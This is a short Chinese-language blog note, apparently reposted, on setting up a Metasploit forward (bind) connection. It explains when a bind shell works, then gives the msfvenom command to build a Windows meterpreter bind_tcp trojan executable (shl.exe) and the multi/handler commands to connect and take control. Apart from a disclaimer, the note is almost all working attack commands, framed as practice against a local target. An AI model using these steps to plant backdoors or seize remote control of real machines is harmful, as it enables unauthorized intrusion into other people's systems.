Metasploit正向连接


声明:个人笔记,如果你看到请勿用于非法用途,出现一切后果与本人无关。

什么情况才能使用到正向连接:

目标不出网的情况下,防火墙关闭的情况下,开放某个流量少的端口情况下,如果目标只开放一个80端口,那么正向可能会失败,因为80端口的流量太大,实战中基本上正向连接很少。反向和正向的区别自行百度

本地靶机:msf实现步骤:生成正向muma命令:msfvenom -p windows/meterpreter/bind_tcp LPORT=80 -f exe -o shl.exe   (由于是本地环境所以我用80端口)

                                 监听:use exploit/multi/handler

                                          set payload windows/meterpreter/bind_tcp

                                         set rhost 目标ip

                                         set rport 目标端口

                                         set lport  攻击机端口

                                         run

效果如下

(注意windows可能会对版本号有影响,x84 x64 32有的不兼容)


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM